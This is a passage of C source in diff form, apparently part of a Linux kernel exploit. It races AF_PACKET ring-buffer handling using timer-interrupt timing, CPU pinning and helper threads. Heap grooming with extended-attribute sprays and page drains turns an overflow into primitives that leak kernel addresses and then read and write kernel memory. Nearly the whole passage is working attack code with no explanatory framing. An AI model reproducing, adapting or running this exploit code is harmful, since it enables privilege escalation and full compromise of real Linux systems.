Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + t->tid = -1; + Pthread_create(&t->handle, NULL, pg_vec_buffer_thread_fn, t); + return t; +} + +void pg_vec_buffer_thread_destroy(struct pg_vec_buffer_thread *t) +{ + pg_vec_buffer_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct tpacket_rcv_thread_work *tpacket_rcv_thread_work_create( + struct timespec pg_vec_lock_release_time, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct msghdr *msg +) +{ + struct tpacket_rcv_thread_work *w = Calloc(1, sizeof(*w)); + w->pg_vec_lock_release_time = pg_vec_lock_release_time; + w->decrease_tpacket_rcv_thread_sleep_time = decrease_tpacket_rcv_thread_sleep_time; + w->msg = msg; + return w; +} + +void tpacket_rcv_thread_work_destroy(struct tpacket_rcv_thread_work *w) +{ + msghdr_destroy(w->msg); + free(w); +} + +void *tpacket_rcv_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct tpacket_rcv_thread *t = arg; + + int trigger_sendmsg_packet_socket = Socket(AF_PACKET, SOCK_PACKET, 0); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct tpacket_rcv_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + struct timespec cur_time = {}; + syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &cur_time); + struct timespec remaining_time_before_pg_vec_lock_release = timespec_sub( + work->pg_vec_lock_release_time, + cur_time + ); + + struct timespec sleep_duration = timespec_sub( + remaining_time_before_pg_vec_lock_release, + work->decrease_tpacket_rcv_thread_sleep_time + ); + + syscall(SYS_nanosleep, &sleep_duration, NULL); + syscall(SYS_sendmsg, trigger_sendmsg_packet_socket, work->msg, 0); + + tpacket_rcv_thread_work_destroy(work); + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + return NULL; +} + +void tpacket_rcv_thread_send_work(struct tpacket_rcv_thread *t, struct tpacket_rcv_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void tpacket_rcv_thread_wait_work_complete(struct tpacket_rcv_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void tpacket_rcv_thread_quit(struct tpacket_rcv_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct tpacket_rcv_thread *tpacket_rcv_thread_create(void) +{ + struct tpacket_rcv_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + Pthread_create(&t->handle, NULL, tpacket_rcv_thread_fn, t); + return t; +} + +void tpacket_rcv_thread_destroy(struct tpacket_rcv_thread *t) +{ + tpacket_rcv_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct msghdr *msghdr_create( + void *data, + size_t datalen, + const char *devname +) +{ + void *copy_data = Calloc(1, datalen); + if (data) + memcpy(copy_data, data, datalen); + + struct iovec *iov = Calloc(1, sizeof(*iov)); + iov->iov_base = copy_data; + iov->iov_len = datalen; + + struct sockaddr_pkt *addr = Calloc(1, sizeof(*addr)); + snprintf((char *)addr->spkt_device, sizeof(addr->spkt_device), "%s", devname); + struct msghdr *msghdr = Calloc(1, sizeof(*msghdr)); + msghdr->msg_namelen = sizeof(struct sockaddr_pkt); + msghdr->msg_name = addr; + msghdr->msg_iov = iov; + msghdr->msg_iovlen = 1; + return msghdr; +} + +void msghdr_destroy(struct msghdr *msghdr) +{ + struct iovec *iov = msghdr->msg_iov; + size_t iov_len = msghdr->msg_iovlen; + for (size_t i = 0; i < iov_len; i++) + free(iov[i].iov_base); + + free(iov); + struct sockaddr_pkt *addr = msghdr->msg_name; + free(addr); + free(msghdr); +} + +struct necessary_threads *necessary_threads_create(int timerfd) +{ + struct necessary_threads *nt = Calloc(1, sizeof(*nt)); + + nt->timerfd_waitlist_threads = Calloc(TOTAL_TIMERFD_WAITLIST_THREADS, sizeof(*nt->timerfd_waitlist_threads)); + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + nt->timerfd_waitlist_threads[i] = timerfd_waitlist_thread_create(timerfd); + + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + timerfd_waitlist_thread_wait_unshare_complete(nt->timerfd_waitlist_threads[i]); + + nt->pg_vec_lock_thread = pg_vec_lock_thread_create(); + nt->pg_vec_buffer_thread = pg_vec_buffer_thread_create(); + nt->tpacket_rcv_thread = tpacket_rcv_thread_create(); + + return nt; +} + +void necessary_threads_destroy(struct necessary_threads *nt) +{ + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + timerfd_waitlist_thread_destroy(nt->timerfd_waitlist_threads[i]); + + pg_vec_lock_thread_destroy(nt->pg_vec_lock_thread); + pg_vec_buffer_thread_destroy(nt->pg_vec_buffer_thread); + tpacket_rcv_thread_destroy(nt->tpacket_rcv_thread); + free(nt); +} + +void pages_order2_read_primitive_init(struct pages_order2_read_primitive *primitive) +{ + primitive->drain_pages_order2_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_1 = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_2 = Socket(AF_PACKET, SOCK_RAW, 0); + + struct tpacket_req3 tx_ring = {}; + tx_ring.tp_block_size = PAGES_ORDER1_SIZE; + tx_ring.tp_block_nr = 1; + tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; + tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; + + struct tpacket_req3 rx_ring = {}; + rx_ring.tp_block_size = PAGES_ORDER3_SIZE; + rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; + rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; + rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; + rx_ring.tp_sizeof_priv = 16248; + rx_ring.tp_retire_blk_tov = USHRT_MAX; + + struct sock_filter filter[MAX_FILTER_LEN] = {}; + for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; // Any value will work + } + + filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; + filter[MAX_FILTER_LEN - 1].k = sizeof(size_t); + + primitive->victim_packet_socket_config = victim_packet_socket_config_create( + (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo + (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr + tx_ring, // tx_ring + rx_ring, // rx_ring + 1, // packet_loss + TPACKET_V3, // packet_version + 30, // packet_reserve + filter // filter + ); + + struct simple_xattr_request *simple_xattr_request = NULL; + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + char value[XATTR_SIZE_MAX] = {}; + char name[XATTR_NAME_MAX + 1] = {}; + snprintf(name, sizeof(name), PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT, i); + snprintf(value, sizeof(value), PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, i); + simple_xattr_request = simple_xattr_request_create( + PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, + name, + value, + KMALLOC_8K_SIZE + ); + + primitive->simple_xattr_requests[i] = simple_xattr_request; + } +} + +void pages_order2_read_primitive_cleanup(struct pages_order2_read_primitive *primitive) +{ + if (primitive->victim_packet_socket_config) { + victim_packet_socket_config_destroy(primitive->victim_packet_socket_config); + primitive->victim_packet_socket_config = NULL; + } + + if (primitive->drain_pages_order2_packet_socket != -1) { + Close(primitive->drain_pages_order2_packet_socket); + primitive->drain_pages_order2_packet_socket = -1; + } + + if (primitive->drain_pages_order3_packet_socket_1 != -1) { + Close(primitive->drain_pages_order3_packet_socket_1); + primitive->drain_pages_order3_packet_socket_1 = -1; + } + + if (primitive->drain_pages_order3_packet_socket_2 != -1) { + Close(primitive->drain_pages_order3_packet_socket_2); + primitive->drain_pages_order3_packet_socket_2 = -1; + } + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + if (primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } + + simple_xattr_request_destroy(primitive->simple_xattr_requests[i]); + primitive->simple_xattr_requests[i] = NULL; + } + + if (primitive->overflowed_simple_xattr_request) { + if (primitive->overflowed_simple_xattr_request->allocated) { + Removexattr( + primitive->overflowed_simple_xattr_request->filepath, + primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(primitive->overflowed_simple_xattr_request); + primitive->overflowed_simple_xattr_request = NULL; + } + } + + if (primitive->leaked_content_simple_xattr_request) { + if (primitive->leaked_content_simple_xattr_request->allocated) { + Removexattr( + primitive->leaked_content_simple_xattr_request->filepath, + primitive->leaked_content_simple_xattr_request->name + ); + + simple_xattr_request_destroy(primitive->leaked_content_simple_xattr_request); + primitive->leaked_content_simple_xattr_request = NULL; + } + } +} + +void pages_order2_read_primitive_page_drain(struct pages_order2_read_primitive *primitive) +{ + alloc_pages(primitive->drain_pages_order2_packet_socket, 1024, PAGES_ORDER2_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_1, 1024, PAGES_ORDER3_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_2, 512, PAGES_ORDER3_SIZE); +} + +void pages_order2_read_primitive_page_drain_cleanup(struct pages_order2_read_primitive *primitive) +{ + free_pages(primitive->drain_pages_order2_packet_socket); + free_pages(primitive->drain_pages_order3_packet_socket_2); +} + +void pages_order2_read_primitive_setup_simple_xattr(struct pages_order2_read_primitive *primitive) +{ + free_pages(primitive->drain_pages_order3_packet_socket_1); + + for (int i = 0; i < ARRAY_SIZE(primitive->simple_xattr_requests); i++) { + Setxattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name, + primitive->simple_xattr_requests[i]->value, + primitive->simple_xattr_requests[i]->value_size, + XATTR_CREATE + ); + + primitive->simple_xattr_requests[i]->allocated = true; + } + + for (int i = 512; i < ARRAY_SIZE(primitive->simple_xattr_requests); i += 128) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } +} + +void pages_order2_read_primitive_cleanup_simple_xattr(struct pages_order2_read_primitive *primitive) +{ + for (int i = 0; i < ARRAY_SIZE(primitive->simple_xattr_requests); i++) { + if (primitive->simple_xattr_requests[i] && primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } + } +} + +void pages_order2_read_primitive_main_work( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time +) +{ + u8 packet_data[128] = {}; + int dummy_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME); + *(size_t *)(packet_data) = XATTR_SIZE_MAX; + + struct pg_vec_lock_thread_work *pg_vec_lock_thread_work = NULL; + struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work = NULL; + struct tpacket_rcv_thread_work *tpacket_rcv_thread_work = NULL; + struct tpacket_rcv_thread_work_result *tpacket_rcv_thread_work_result = NULL; + struct msghdr *msghdr = NULL; + + struct victim_packet_socket_config *victim_packet_socket_config = primitive->victim_packet_socket_config; + struct timespec pg_vec_lock_timeout = { + .tv_sec = victim_packet_socket_config->sndtimeo.tv_sec, + .tv_nsec = victim_packet_socket_config->sndtimeo.tv_usec * NSEC_PER_USEC + }; + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct victim_packet_socket *victim_packet_socket = victim_packet_socket_create(victim_packet_socket_config); + pg_vec_lock_thread_work = pg_vec_lock_thread_work_create(victim_packet_socket, dummy_ifindex); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(victim_packet_socket, true, false); + msghdr = msghdr_create(packet_data, sizeof(packet_data), DUMMY_INTERFACE_NAME); + pages_order2_read_primitive_page_drain(primitive); + victim_packet_socket_configure(victim_packet_socket); + pages_order2_read_primitive_setup_simple_xattr(primitive); + + pg_vec_lock_thread_send_work(necessary_threads->pg_vec_lock_thread, pg_vec_lock_thread_work); + struct timespec pg_vec_lock_acquire_time = pg_vec_lock_thread_wait_in_work(necessary_threads->pg_vec_lock_thread); + network_interface_down(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_in_work(necessary_threads->pg_vec_buffer_thread); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + struct timespec pg_vec_lock_release_time = timespec_add(pg_vec_lock_acquire_time, pg_vec_lock_timeout); + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct itimerspec settime_value = {}; + settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); + Timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); + + tpacket_rcv_thread_work = tpacket_rcv_thread_work_create(pg_vec_lock_release_time, decrease_tpacket_rcv_thread_sleep_time, msghdr); + tpacket_rcv_thread_send_work(necessary_threads->tpacket_rcv_thread, tpacket_rcv_thread_work); + tpacket_rcv_thread_wait_work_complete(necessary_threads->tpacket_rcv_thread); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + pg_vec_lock_thread_wait_work_complete(necessary_threads->pg_vec_lock_thread); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(NULL, false, true); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + victim_packet_socket_destroy(victim_packet_socket); +} + +bool pages_order2_read_primitive_build_primitive( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +) +{ + pages_order2_read_primitive_main_work( + primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + decrease_tpacket_rcv_thread_sleep_time, + timer_interrupt_amplitude + ); + + struct simple_xattr_request *overflowed_request = NULL; + struct simple_xattr_request *simple_xattr_request = NULL; + bool overflow_success = false; + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY && !overflow_success; i++) { + char value[KMALLOC_8K_SIZE] = {}; + + simple_xattr_request = primitive->simple_xattr_requests[i]; + if (!simple_xattr_request || !simple_xattr_request->allocated) + continue; + + ssize_t getxattr_ret = getxattr( + simple_xattr_request->filepath, + simple_xattr_request->name, + value, + KMALLOC_8K_SIZE + ); + + if (getxattr_ret < 0 && errno == ERANGE) { + primitive->overflowed_simple_xattr_request = simple_xattr_request; + primitive->simple_xattr_requests[i] = NULL; + overflow_success = true; + } + } + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + pages_order2_read_primitive_page_drain_cleanup(primitive); + + if (!overflow_success) { + pages_order2_read_primitive_cleanup_simple_xattr(primitive); + } else { + Close(primitive->drain_pages_order2_packet_socket); + primitive->drain_pages_order2_packet_socket = -1; + Close(primitive->drain_pages_order3_packet_socket_1); + primitive->drain_pages_order3_packet_socket_1 = -1; + Close(primitive->drain_pages_order3_packet_socket_2); + primitive->drain_pages_order3_packet_socket_2 = -1; + } + + return overflow_success; +} + +struct pages_order2_read_primitive pages_order2_read_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd +) +{ + struct pages_order2_read_primitive pages_order2_read_primitive = {}; + pages_order2_read_primitive_init(&pages_order2_read_primitive); + + struct timespec pages_order2_read_primitive_sleep_decrease_amplitude = { .tv_nsec = 5000 }; + struct timespec pages_order2_read_primitive_timer_interrupt_amplitude = { .tv_nsec = 150000 }; + + bool pages_order2_read_primitive_build_success = false; + while (!pages_order2_read_primitive_build_success) { + pages_order2_read_primitive_build_success = pages_order2_read_primitive_build_primitive( + &pages_order2_read_primitive, + necessary_threads, + configure_network_interface_socket, + timerfd, + pages_order2_read_primitive_sleep_decrease_amplitude, + pages_order2_read_primitive_timer_interrupt_amplitude + ); + + if (pages_order2_read_primitive_build_success) { + if (!pages_order2_read_primitive_build_leaked_simple_xattr(&pages_order2_read_primitive)) { + pages_order2_read_primitive_cleanup(&pages_order2_read_primitive); + pages_order2_read_primitive_init(&pages_order2_read_primitive); + pages_order2_read_primitive_build_success = false; + } + } + } + + return pages_order2_read_primitive; +} + +void *pages_order2_read_primitive_trigger(struct pages_order2_read_primitive *pages_order2_read_primitive) +{ + void *leak_data = Calloc(1, XATTR_SIZE_MAX); + Getxattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name, + leak_data, + XATTR_SIZE_MAX + ); + + return leak_data; +} + +bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive) +{ + void *leak_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive); + struct simple_xattr *leaked_simple_xattrs = leak_data + PAGES_ORDER2_SIZE - sizeof(struct simple_xattr); + struct simple_xattr *leaked_simple_xattr = NULL; + int leaked_simple_xattr_count = (XATTR_SIZE_MAX - (PAGES_ORDER2_SIZE - sizeof(struct simple_xattr))) / PAGES_ORDER2_SIZE; + int simple_xattr_requests_idx = -1; + int leaked_simple_xattrs_idx = -1; + bool found_leaked_simple_xattr = false; + + for (int i = 0; i < leaked_simple_xattr_count && !found_leaked_simple_xattr; i++) { + leaked_simple_xattr = &leaked_simple_xattrs[i]; + + if (!is_data_look_like_simple_xattr(leaked_simple_xattr, KMALLOC_8K_SIZE)) + continue; + else { + simple_xattr_dump(leaked_simple_xattr); + } + + u8 *leaked_simple_xattr_value = leaked_simple_xattr->value; + + if ( + strncmp( + leaked_simple_xattr_value, + PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN, + strlen(PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN) + ) != 0 + ) { + continue; + } + + if (sscanf(leaked_simple_xattr_value, PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, &simple_xattr_requests_idx) != 1) + continue; + + if (simple_xattr_requests_idx < 0 || simple_xattr_requests_idx >= TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY) + continue; + + pages_order2_read_primitive->leaked_content_simple_xattr_request = pages_order2_read_primitive->simple_xattr_requests[simple_xattr_requests_idx]; + pages_order2_read_primitive->simple_xattr_requests[simple_xattr_requests_idx] = NULL; + leaked_simple_xattrs_idx = i; + found_leaked_simple_xattr = true; + } + + if (!found_leaked_simple_xattr) { + free(leak_data); + + Removexattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(pages_order2_read_primitive->overflowed_simple_xattr_request); + pages_order2_read_primitive->overflowed_simple_xattr_request = NULL; + + pages_order2_read_primitive_cleanup_simple_xattr(pages_order2_read_primitive); + return false; + } + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + if (pages_order2_read_primitive->simple_xattr_requests[i] && pages_order2_read_primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + pages_order2_read_primitive->simple_xattr_requests[i]->filepath, + pages_order2_read_primitive->simple_xattr_requests[i]->name + ); + + pages_order2_read_primitive->simple_xattr_requests[i]->allocated = false; + } + } + + free(leak_data); + leak_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive); + leaked_simple_xattrs = leak_data + PAGES_ORDER2_SIZE - sizeof(struct simple_xattr); + leaked_simple_xattr = &leaked_simple_xattrs[leaked_simple_xattrs_idx]; + + u64 next = (u64)(leaked_simple_xattr->list.next); + u64 prev = (u64)(leaked_simple_xattr->list.prev); + u64 overflowed_simple_xattr_kernel_address = 0; + + if ((next & (PAGES_ORDER2_SIZE - 1)) == 0) { + overflowed_simple_xattr_kernel_address = next; + } else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0) { + overflowed_simple_xattr_kernel_address = prev; + } + + pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = overflowed_simple_xattr_kernel_address; + pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE; + + printf("[DEBUG] pages_order2_read_primitive->overflowed_simple_xattr_kernel_address: 0x%016lx\n", pages_order2_read_primitive->overflowed_simple_xattr_kernel_address); + printf("[DEBUG] pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address: 0x%016lx\n", pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address); + + free(leak_data); + return true; +} + +void simple_xattr_read_write_primitive_init(struct simple_xattr_read_write_primitive *primitive) +{ + primitive->drain_pages_order2_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_1 = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_2 = Socket(AF_PACKET, SOCK_RAW, 0); + + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) + primitive->spray_pg_vec_packet_sockets[i] = Socket(AF_PACKET, SOCK_RAW, 0); + + primitive->overflowed_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + struct tpacket_req3 tx_ring = {}; + tx_ring.tp_block_size = PAGES_ORDER1_SIZE; + tx_ring.tp_block_nr = 1; + tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; + tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; + + struct tpacket_req3 rx_ring = {}; + rx_ring.tp_block_size = PAGES_ORDER3_SIZE; + rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; + rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; + rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; + rx_ring.tp_sizeof_priv = 16248; + rx_ring.tp_retire_blk_tov = USHRT_MAX; + + struct sock_filter filter[MAX_FILTER_LEN] = {}; + for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; // Any value will work + } + + filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; + filter[MAX_FILTER_LEN - 1].k = sizeof(void *); + + primitive->victim_packet_socket_config = victim_packet_socket_config_create( + (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo + (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr + tx_ring, // tx_ring + rx_ring, // rx_ring + 1, // packet_loss + TPACKET_V3, // packet_version + 30, // packet_reserve + filter // filter + ); +} + +void simple_xattr_read_write_primitive_page_drain(struct simple_xattr_read_write_primitive *primitive) +{ + alloc_pages(primitive->drain_pages_order2_packet_socket, 256, PAGES_ORDER2_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_1, 128, PAGES_ORDER3_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_2, 128, PAGES_ORDER3_SIZE); +} + +void simple_xattr_read_write_primitive_setup_pg_vec(struct simple_xattr_read_write_primitive *primitive) +{ + free_pages(primitive->drain_pages_order3_packet_socket_1); + + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) { + alloc_pages(primitive->spray_pg_vec_packet_sockets[i], MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); + primitive->spray_pg_vec_packet_sockets_state[i] = 1; + } + + for (int i = 64, free_count = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets) && free_count < 6; i += 16, free_count++) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; + } +} + +void simple_xattr_read_write_primitive_page_drain_cleanup(struct simple_xattr_read_write_primitive *primitive) +{ + free_pages(primitive->drain_pages_order2_packet_socket); + free_pages(primitive->drain_pages_order3_packet_socket_2); +} + +void simple_xattr_read_write_primitive_pg_vec_cleanup(struct simple_xattr_read_write_primitive *primitive) +{ + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) { + if (primitive->spray_pg_vec_packet_sockets_state[i] && primitive->spray_pg_vec_packet_sockets[i] != -1) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; + } + } +} + +void simple_xattr_read_write_primitive_main_work( + struct simple_xattr_read_write_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + u64 simple_xattr_kernel_address +) +{ + u8 packet_data[128] = {}; + int dummy_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME); + *(u64 *)(packet_data) = simple_xattr_kernel_address; + + struct pg_vec_lock_thread_work *pg_vec_lock_thread_work = NULL; + struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work = NULL; + struct tpacket_rcv_thread_work *tpacket_rcv_thread_work = NULL; + struct tpacket_rcv_thread_work_result *tpacket_rcv_thread_work_result = NULL; + struct msghdr *msghdr = NULL; + + struct victim_packet_socket_config *victim_packet_socket_config = primitive->victim_packet_socket_config; + struct timespec pg_vec_lock_timeout = { + .tv_sec = victim_packet_socket_config->sndtimeo.tv_sec, + .tv_nsec = victim_packet_socket_config->sndtimeo.tv_usec * NSEC_PER_USEC + }; + + struct victim_packet_socket *victim_packet_socket = victim_packet_socket_create(victim_packet_socket_config); + pg_vec_lock_thread_work = pg_vec_lock_thread_work_create(victim_packet_socket, dummy_ifindex); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(victim_packet_socket, true, false); + msghdr = msghdr_create(packet_data, sizeof(packet_data), DUMMY_INTERFACE_NAME); + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + simple_xattr_read_write_primitive_page_drain(primitive); + victim_packet_socket_configure(victim_packet_socket); + simple_xattr_read_write_primitive_setup_pg_vec(primitive); + pg_vec_lock_thread_send_work(necessary_threads->pg_vec_lock_thread, pg_vec_lock_thread_work); + struct timespec pg_vec_lock_acquire_time = pg_vec_lock_thread_wait_in_work(necessary_threads->pg_vec_lock_thread); + network_interface_down(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_in_work(necessary_threads->pg_vec_buffer_thread); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + struct timespec pg_vec_lock_release_time = timespec_add(pg_vec_lock_acquire_time, pg_vec_lock_timeout); + + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct itimerspec settime_value = {}; + settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); + Timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); + + tpacket_rcv_thread_work = tpacket_rcv_thread_work_create(pg_vec_lock_release_time, decrease_tpacket_rcv_thread_sleep_time, msghdr); + tpacket_rcv_thread_send_work(necessary_threads->tpacket_rcv_thread, tpacket_rcv_thread_work); + tpacket_rcv_thread_wait_work_complete(necessary_threads->tpacket_rcv_thread); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + pg_vec_lock_thread_wait_work_complete(necessary_threads->pg_vec_lock_thread); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(NULL, false, true); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + victim_packet_socket_destroy(victim_packet_socket); +} + +bool simple_xattr_read_write_primitive_build_primitive( + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec 